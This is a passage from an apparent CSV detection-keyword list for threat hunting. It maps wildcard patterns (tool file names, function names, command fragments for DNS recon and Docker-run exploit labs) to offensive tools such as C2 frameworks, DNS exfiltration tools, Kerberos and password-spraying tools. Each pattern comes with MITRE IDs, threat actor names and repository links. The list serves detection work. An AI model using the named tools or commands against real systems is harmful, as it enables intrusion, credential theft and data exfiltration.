Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/dr0op/CrossNet-Beta","1","1","N/A","10","10","352","56","2022-07-18T06:23:16Z","2021-02-08T10:52:39Z" +"*DNS-Persist.git*","offensive_tool_keyword","DNS-Persist","DNS-Persist is a post-exploitation agent which uses DNS for command and control.","T1090.004 - T1021.002 - T1071.001","TA0011 - TA0008","N/A","N/A","C2","https://github.com/0x09AL/DNS-Persist","1","1","N/A","10","10","211","75","2017-11-20T08:53:25Z","2017-11-10T15:23:49Z" +"*dnsrecon -*","offensive_tool_keyword","thoth","Automate recon for red team assessments.","T1190 - T1083 - T1018","TA0007 - 
TA0043 - TA0001","N/A","N/A","Reconnaissance","https://github.com/r1cksec/thoth","1","0","N/A","7","1","75","8","2023-09-27T06:46:46Z","2021-11-15T13:40:56Z" +"*dnsrecon*","offensive_tool_keyword","dnsrecon","DNSRecon is a Python port of a Ruby script that I wrote to learn the language and about DNS in early 2007. This time I wanted to learn about Python and extend the functionality of the original tool and in the process re-learn how DNS works and how could it be used in the process of a security assessment and network troubleshooting.","T1590 - T1590.001","TA0001 - TA0007","N/A","N/A","Information Gathering","https://github.com/darkoperator/dnsrecon","1","1","N/A","6","10","2336","516","2023-09-11T05:14:02Z","2010-12-16T03:25:49Z" +"*dnsrecon-zonetransfer*","offensive_tool_keyword","thoth","Automate recon for red team assessments.","T1190 - T1083 - T1018","TA0007 - TA0043 - TA0001","N/A","N/A","Reconnaissance","https://github.com/r1cksec/thoth","1","0","N/A","7","1","75","8","2023-09-27T06:46:46Z","2021-11-15T13:40:56Z" +"*dnsteal.git*","offensive_tool_keyword","dnsteal","This is a fake DNS server that allows you to stealthily extract files from a victim machine through DNS requests.","T1048.003 - T1568.002 - T1573.002","TA0010 - TA0002","N/A","N/A","Data Exfiltration","https://github.com/m57/dnsteal","1","1","N/A","3","10","1378","236","2022-02-03T11:04:49Z","2015-08-11T17:02:58Z" +"*dnsteal.py*","offensive_tool_keyword","dnsteal","This is a fake DNS server that allows you to stealthily extract files from a victim machine through DNS requests.","T1048.003 - T1568.002 - T1573.002","TA0010 - TA0002","N/A","N/A","Data Exfiltration","https://github.com/m57/dnsteal","1","1","N/A","3","10","1378","236","2022-02-03T11:04:49Z","2015-08-11T17:02:58Z" +"*dnsteal-master*","offensive_tool_keyword","dnsteal","This is a fake DNS server that allows you to stealthily extract files from a victim machine through DNS requests.","T1048.003 - T1568.002 - T1573.002","TA0010 - 
TA0002","N/A","N/A","Data Exfiltration","https://github.com/m57/dnsteal","1","1","N/A","3","10","1378","236","2022-02-03T11:04:49Z","2015-08-11T17:02:58Z" +"*dnstracer*","offensive_tool_keyword","DNSTracer","This is a python application that traces how a DNS query is performed from a client machine to the server.","T1556 - T1016 - T1046","TA0007 - TA0001","N/A","N/A","Sniffing & Spoofing","https://github.com/pcoder/DNSTracer","1","0","N/A","3","1","6","1","2011-11-11T22:06:48Z","2011-07-07T18:36:07Z" +"*dnstwist*","offensive_tool_keyword","dnstwist","See what sort of trouble users can get in trying to type your domain name. Find lookalike domains that adversaries can use to attack you. Can detect typosquatters. phishing attacks. fraud. and brand impersonation. Useful as an additional source of targeted threat intelligence.","T1560 - T1565 - T1566 - T1568 - T1569","TA0002 - TA0005","N/A","N/A","Phishing","https://github.com/elceef/dnstwist","1","0","N/A","3","10","4154","709","2023-10-01T22:26:34Z","2015-06-11T12:24:17Z" +"*dnsx -silent -d * -w dns_worldlist.txt*","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1251","151","2023-09-30T20:47:39Z","2020-03-09T19:12:11Z" +"*dnsx -silent -d domains.txt -w jira*grafana*jenkins*","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1251","151","2023-09-30T20:47:39Z","2020-03-09T19:12:11Z" +"*do_attack(*","offensive_tool_keyword","cobaltstrike","Beacon Object 
File (BOF) to obtain a usable TGT for the current user and does not require elevated privileges on the host","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/connormcgarr/tgtdelegation","1","0","N/A","10","10","128","21","2021-11-26T16:45:05Z","2021-11-22T18:42:57Z" +"*do_bypassuac*","offensive_tool_keyword","DNS-Persist","DNS-Persist is a post-exploitation agent which uses DNS for command and control.","T1090.004 - T1021.002 - T1071.001","TA0011 - TA0008","N/A","N/A","C2","https://github.com/0x09AL/DNS-Persist","1","0","N/A","10","10","211","75","2017-11-20T08:53:25Z","2017-11-10T15:23:49Z" +"*do_pyinject*","offensive_tool_keyword","Slackor","A Golang implant that uses Slack as a command and control server","T1059.003 - T1071.004 - T1562.001","TA0002 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/Coalfire-Research/Slackor","1","0","N/A","10","10","451","108","2023-02-25T03:35:15Z","2019-06-18T16:01:37Z" +"*Do-AltShiftEsc*","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. 
cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","Invoke-MS16135.ps1","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" +"*Do-AltShiftTab*","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. 
Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","Invoke-MS16135.ps1","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" +"*doc/extras/HACKING.*","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","10","8297","1937","2023-10-03T13:59:15Z","2011-12-16T19:43:47Z" +"*docker * covenant*","offensive_tool_keyword","covenant","Covenant is a collaborative .NET C2 framework for red teamers","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1570-001","TA0002 - 
TA0003","N/A","N/A","C2","https://github.com/cobbr/Covenant","1","0","N/A","10","10","3790","733","2023-02-21T23:55:48Z","2019-02-07T15:55:18Z" +"*docker * --name elite *","offensive_tool_keyword","covenant","Covenant is a collaborative .NET C2 framework for red teamers","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1570-001","TA0002 - TA0003","N/A","N/A","C2","https://github.com/cobbr/Covenant","1","0","N/A","10","10","3790","733","2023-02-21T23:55:48Z","2019-02-07T15:55:18Z" +"*docker * -t elite *","offensive_tool_keyword","covenant","Covenant is a collaborative .NET C2 framework for red teamers","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1570-001","TA0002 - TA0003","N/A","N/A","C2","https://github.com/cobbr/Covenant","1","0","N/A","10","10","3790","733","2023-02-21T23:55:48Z","2019-02-07T15:55:18Z" +"*docker build -t rmg .*","offensive_tool_keyword","remote-method-guesser","remote-method-guesser?(rmg) is a?Java RMI?vulnerability scanner and can be used to identify and verify common security vulnerabilities on?Java RMI?endpoints.","T1210.002 - T1046 - T1078.003","TA0001 - TA0007 - TA0040","N/A","N/A","Vulnerability Scanner","https://github.com/qtc-de/remote-method-guesser","1","0","N/A","6","8","709","120","2023-10-03T06:22:32Z","2019-11-04T11:37:38Z" +"*docker run */pacu:latest*","offensive_tool_keyword","pacu","The AWS exploitation framework designed for testing the security of Amazon Web Services environments.","T1136.003 - T1190 - T1078.004","TA0006 - TA0001","N/A","N/A","Framework","https://github.com/RhinoSecurityLabs/pacu","1","0","N/A","9","10","3689","624","2023-10-03T04:16:53Z","2018-06-13T21:58:59Z" +"*docker run */usr/src/rde1*","offensive_tool_keyword","RDE1","RDE1 (Rusty Data Exfiltrator) is client and server tool allowing 
auditor to extract files from DNS and HTTPS protocols written in Rust","T1048.003 - T1567.001 - T1020","TA0011 - TA0010 - TA0040","N/A","N/A","C2","https://github.com/g0h4n/RDE1","1","0","N/A","10","10","31","3","2023-10-02T17:47:11Z","2023-09-25T20:29:08Z" +"*docker run */usr/src/rec2*","offensive_tool_keyword","RDE1","RDE1 (Rusty Data Exfiltrator) is client and server tool allowing auditor to extract files from DNS and HTTPS protocols written in Rust","T1048.003 - T1567.001 - T1020","TA0011 - TA0010 - TA0040","N/A","N/A","C2","https://github.com/g0h4n/RDE1","1","0","N/A","10","10","31","3","2023-10-02T17:47:11Z","2023-09-25T20:29:08Z" +"*docker run -p * spring4shell","offensive_tool_keyword","Spring4Shell","Dockerized Spring4Shell (CVE-2022-22965) PoC application and exploit","T1550 - T1555 - T1212 - T1558","TA0001 - TA0004 - TA0006","N/A","N/A","Exploitation tools","https://github.com/reznok/Spring4Shell-POC","1","0","N/A","N/A","4","303","229","2022-08-04T18:26:18Z","2022-03-31T00:24:28Z" +"*docker run sitadel*","offensive_tool_keyword","Sitadel","Web Application Security Scanner","T1592.002 - T1210.001 - T1190.001 - T1046 - T1213 - T1071.001","TA0001 - TA0007 - TA0043 - TA0002 - TA0003","N/A","N/A","Network Exploitation tools","https://github.com/shenril/Sitadel","1","0","N/A","N/A","6","516","111","2020-01-21T14:59:40Z","2018-01-17T09:06:24Z" +"*docker* donut *","offensive_tool_keyword","donut","Donut is a position-independent code that enables in-memory execution of VBScript. JScript. EXE. DLL files and dotNET assemblies. 
A module created by Donut can either be staged from a HTTP server or embedded directly in the loader itself","T1055 - T1027 - T1202","TA0002 - TA0003 ","N/A","Indrik Spider","Exploitation tools","https://github.com/TheWover/donut","1","0","N/A","N/A","10","2878","558","2023-04-26T21:11:01Z","2019-03-27T23:24:44Z" +"*docker-compose logs wiresocks*","offensive_tool_keyword","wiresocks","Docker-compose and Dockerfile to setup a wireguard VPN connection forcing specific TCP traffic through a socks proxy.","T1090.004 - T1572 - T1021.001","TA0011 - TA0002 - TA0040","N/A","N/A","Defense Evasion","https://github.com/sensepost/wiresocks","1","0","N/A","9","3","250","24","2022-09-29T07:41:16Z","2022-03-23T12:27:07Z" +"*DockerPwn*","offensive_tool_keyword","DockerPwn","Automation for abusing an exposed Docker TCP Socket. ","T1068 - T1528 - T1550","TA0002 - TA0003 - TA0008","N/A","N/A","Exploitation tools","https://github.com/AbsoZed/DockerPwn.py","1","0","N/A","N/A","3","208","30","2022-12-08T03:17:35Z","2019-11-23T22:32:49Z" +"*DocPlz-main.zip*","offensive_tool_keyword","DocPlz","Documents Exfiltration and C2 project","T1105 - T1567 - T1071","TA0011 - TA0010 - TA0009","N/A","N/A","Data Exfiltration","https://github.com/TheD1rkMtr/DocPlz","1","1","N/A","10","1","81","13","2023-10-03T23:06:53Z","2023-10-02T20:49:22Z" +"*DocsPLZ\DocsPLZ.*","offensive_tool_keyword","DocPlz","Documents Exfiltration and C2 project","T1105 - T1567 - T1071","TA0011 - TA0010 - TA0009","N/A","N/A","Data Exfiltration","https://github.com/TheD1rkMtr/DocPlz","1","0","N/A","10","1","81","13","2023-10-03T23:06:53Z","2023-10-02T20:49:22Z" +"*DoEvil()*","offensive_tool_keyword","ETWEventSubscription","Similar to WMI event subscriptions but leverages Event Tracing for Windows. 
When the event on the system occurs currently either when any user logs in or a specified process is started - the DoEvil() method is executed.","T1053.005 - T1546.003 - T1055.001","TA0004 - TA0005","N/A","N/A","Exploitation tools","https://github.com/matterpreter/OffensiveCSharp/tree/master/ETWEventSubscription","1","0","N/A","10","10","1214","252","2023-02-06T14:56:26Z","2019-02-06T00:32:29Z" +"*Do-Exfiltration.ps1*","offensive_tool_keyword","nishang","Nishang is a framework and collection of scripts and payloads which enables usage of PowerShell for offensive security penetration testing and red teaming. Nishang is useful during all phases of penetration testing.","T1550 T1555 T1212 T1558","N/A","N/A","N/A","Exploitation tools","https://github.com/samratashok/nishang","1","1","N/A","N/A","10","7851","2361","2023-09-05T07:54:08Z","2014-05-19T11:48:24Z" +"*Doge-Loader*xor.go*","offensive_tool_keyword","cobaltstrike","Cobalt Strike Shellcode Loader by Golang","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - 
APT29","C2","https://github.com/timwhitez/Doge-Loader","1","1","N/A","10","10","277","61","2021-04-22T08:24:59Z","2020-10-09T04:47:54Z" +"*DoHC2*BeaconConnector*","offensive_tool_keyword","DoHC2","DoHC2 allows the ExternalC2 library from Ryan Hanson (https://github.com/ryhanson/ExternalC2) to be leveraged for command and control (C2) via DNS over HTTPS (DoH). This is built for the popular Adversary Simulation and Red Team Operations Software Cobalt Strike","T1090.004 - T1021.002 - T1071.001","TA0011 - TA0008","N/A","N/A","C2","https://github.com/SpiderLabs/DoHC2","1","1","N/A","10","10","432","99","2020-08-07T12:48:13Z","2018-10-23T19:40:23Z" +"*DoHC2.exe*","offensive_tool_keyword","DoHC2","DoHC2 allows the ExternalC2 library from Ryan Hanson (https://github.com/ryhanson/ExternalC2) to be leveraged for command and control (C2) via DNS over HTTPS (DoH). This is built for the popular Adversary Simulation and Red Team Operations Software Cobalt Strike","T1090.004 - T1021.002 - T1071.001","TA0011 - TA0008","N/A","N/A","C2","https://github.com/SpiderLabs/DoHC2","1","1","N/A","10","10","432","99","2020-08-07T12:48:13Z","2018-10-23T19:40:23Z" +"*DoHC2.py*","offensive_tool_keyword","DoHC2","DoHC2 allows the ExternalC2 library from Ryan Hanson (https://github.com/ryhanson/ExternalC2) to be leveraged for command and control (C2) via DNS over HTTPS (DoH). This is built for the popular Adversary Simulation and Red Team Operations Software Cobalt Strike","T1090.004 - T1021.002 - T1071.001","TA0011 - TA0008","N/A","N/A","C2","https://github.com/SpiderLabs/DoHC2","1","1","N/A","10","10","432","99","2020-08-07T12:48:13Z","2018-10-23T19:40:23Z" +"*DoHC2Runner.*","offensive_tool_keyword","DoHC2","DoHC2 allows the ExternalC2 library from Ryan Hanson (https://github.com/ryhanson/ExternalC2) to be leveraged for command and control (C2) via DNS over HTTPS (DoH). 
This is built for the popular Adversary Simulation and Red Team Operations Software Cobalt Strike","T1090.004 - T1021.002 - T1071.001","TA0011 - TA0008","N/A","N/A","C2","https://github.com/SpiderLabs/DoHC2","1","1","N/A","10","10","432","99","2020-08-07T12:48:13Z","2018-10-23T19:40:23Z" +"*DoHC2Runner.exe*","offensive_tool_keyword","DoHC2","DoHC2 allows the ExternalC2 library from Ryan Hanson (https://github.com/ryhanson/ExternalC2) to be leveraged for command and control (C2) via DNS over HTTPS (DoH). This is built for the popular Adversary Simulation and Red Team Operations Software Cobalt Strike","T1090.004 - T1021.002 - T1071.001","TA0011 - TA0008","N/A","N/A","C2","https://github.com/SpiderLabs/DoHC2","1","1","N/A","10","10","432","99","2020-08-07T12:48:13Z","2018-10-23T19:40:23Z" +"*DoHC2Runner.pdb*","offensive_tool_keyword","DoHC2","DoHC2 allows the ExternalC2 library from Ryan Hanson (https://github.com/ryhanson/ExternalC2) to be leveraged for command and control (C2) via DNS over HTTPS (DoH). This is built for the popular Adversary Simulation and Red Team Operations Software Cobalt Strike","T1090.004 - T1021.002 - T1071.001","TA0011 - TA0008","N/A","N/A","C2","https://github.com/SpiderLabs/DoHC2","1","1","N/A","10","10","432","99","2020-08-07T12:48:13Z","2018-10-23T19:40:23Z" +"*DoHChannel.cs*","offensive_tool_keyword","DoHC2","DoHC2 allows the ExternalC2 library from Ryan Hanson (https://github.com/ryhanson/ExternalC2) to be leveraged for command and control (C2) via DNS over HTTPS (DoH). This is built for the popular Adversary Simulation and Red Team Operations Software Cobalt Strike","T1090.004 - T1021.002 - T1071.001","TA0011 - TA0008","N/A","N/A","C2","https://github.com/SpiderLabs/DoHC2","1","0","N/A","10","10","432","99","2020-08-07T12:48:13Z","2018-10-23T19:40:23Z" +"*-Domain * -AllowDelegation *","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. 
cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","0","N/A","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" +"*-Domain * -SPN *","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. 
Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","0","N/A","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" +"*Domain/CommandCollection*","offensive_tool_keyword","Rubeus","Rubeus is a C# toolset for raw Kerberos interaction and abuses. It is heavily adapted from Benjamin Delpys Kekeo project (CC BY-NC-SA 4.0 license) and Vincent LE TOUXs MakeMeEnterpriseAdmin project (GPL v3.0 license). 
Full credit goes to Benjamin and Vincent for working out the hard components of weaponization- without their prior work this project would not exist.","T1558 - T1559 - T1078 - T1550","TA0002 - TA0003 - TA0007","N/A","N/A","Credential Access","https://github.com/GhostPack/Rubeus","1","1","N/A","N/A","10","3454","711","2023-09-25T09:48:31Z","2018-09-23T23:59:03Z" +"*-domain_admins.txt*","offensive_tool_keyword","SilentHound","Quietly enumerate an Active Directory Domain via LDAP parsing users + admins + groups...","T1087.002 - T1018 - T1069.002","TA0007 - TA0009","N/A","N/A","AD Enumeration","https://github.com/layer8secure/SilentHound","1","0","N/A","N/A","5","430","44","2023-01-23T20:41:55Z","2022-07-01T13:49:24Z" +"*domain_analyzer.py*","offensive_tool_keyword","domain_analyzer","Analyze the security of any domain by finding all the information possible","T1560 - T1590 - T1200 - T1213 - T1057","TA0002 - TA0009","N/A","N/A","Information Gathering","https://github.com/eldraco/domain_analyzer","1","1","N/A","6","10","1831","259","2022-12-29T10:57:33Z","2017-08-08T18:52:34Z" +"*domain_analyzer-master*","offensive_tool_keyword","domain_analyzer","Analyze the security of any domain by finding all the information possible","T1560 - T1590 - T1200 - T1213 - T1057","TA0002 - TA0009","N/A","N/A","Information Gathering","https://github.com/eldraco/domain_analyzer","1","1","N/A","6","10","1831","259","2022-12-29T10:57:33Z","2017-08-08T18:52:34Z" +"*domain_hunter-v*.jar","offensive_tool_keyword","burpsuite","Collection of burpsuite plugins","T1556 - T1556.001 - T1556.002 - T1556.003 - T1557 - T1558 - T1573 - T1574","TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","Network Exploitation tools","https://github.com/Mr-xn/BurpSuite-collections","1","1","N/A","N/A","10","2757","606","2023-08-04T13:50:07Z","2020-01-25T02:07:37Z" +"*domainDumpConfig*","offensive_tool_keyword","ldapdomaindump","Active Directory information dumper via LDAP","T1087 - T1005 - 
T1016","TA0007","N/A","N/A","Credential Access","https://github.com/dirkjanm/ldapdomaindump","1","1","N/A","N/A","10","970","176","2023-09-06T05:50:30Z","2016-05-24T18:46:56Z" +"*DomainEnumerator*","offensive_tool_keyword","bloodhound","A Python based ingestor for BloodHound","T1057 - T1059 - T1053","TA0003 - TA0008 - TA0009","N/A","N/A","Reconnaissance","https://github.com/fox-it/BloodHound.py","1","1","N/A","10","10","1539","268","2023-09-27T07:56:12Z","2018-02-26T14:44:20Z" +"*domainhunter*","offensive_tool_keyword","domainhunter","Domain name selection is an important aspect of preparation for penetration tests and especially Red Team engagements. Commonly. domains that were used previously for benign purposes and were properly categorized can be purchased for only a few dollars. Such domains can allow a team to bypass reputation based web filters and network egress restrictions for phishing and C2 related tasks.This Python based tool was written to quickly query the Expireddomains.net search engine for expired/available domains with a previous history of use. It then optionally queries for domain reputation against services like Symantec Site Review (BlueCoat). IBM X-Force. and Cisco Talos. 
The primary tool output is a timestamped HTML table style report.","T1568 - T1596 - T1569 - T1593","N/A","N/A","N/A","Information Gathering","https://github.com/threatexpress/domainhunter","1","0","N/A","N/A","10","1380","291","2022-10-26T03:15:13Z","2017-03-01T11:16:26Z" +"*domainhunter.py*","offensive_tool_keyword","domainhunter","Checks expired domains for categorization/reputation and Archive.org history to determine good candidates for phishing and C2 domain names ","T1583.002 - T1568.002","TA0011 - TA0009","N/A","N/A","Phishing","https://github.com/threatexpress/domainhunter","1","1","N/A","N/A","10","1380","291","2022-10-26T03:15:13Z","2017-03-01T11:16:26Z" +"*Domaininfo/Domaininfo.py*","offensive_tool_keyword","havoc","Havoc is a modern and malleable post-exploitation command and control framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1027 - T1071-001 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001","TA0002 - TA0003","N/A","N/A","C2","https://github.com/HavocFramework/Havoc","1","1","N/A","10","10","4898","745","2023-10-04T21:22:20Z","2022-09-11T13:21:16Z" +"*Domainpassspray*","offensive_tool_keyword","WinPwn","Automation for internal Windows Penetrationtest AD-Security","T1003 - T1087 - T1069 - T1047 - T1547.001 - T1035","TA0006 - TA0007 - TA0002 - TA0005 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/S3cur3Th1sSh1t/WinPwn","1","1","N/A","N/A","10","2961","495","2023-07-13T14:09:33Z","2018-03-07T12:51:25Z" +"*DomainPasswordSpray*","offensive_tool_keyword","DomainPasswordSpray","DomainPasswordSpray is a tool written in PowerShell to perform a password spray attack against users of a domain. By default it will automatically generate the userlist from the domain. 
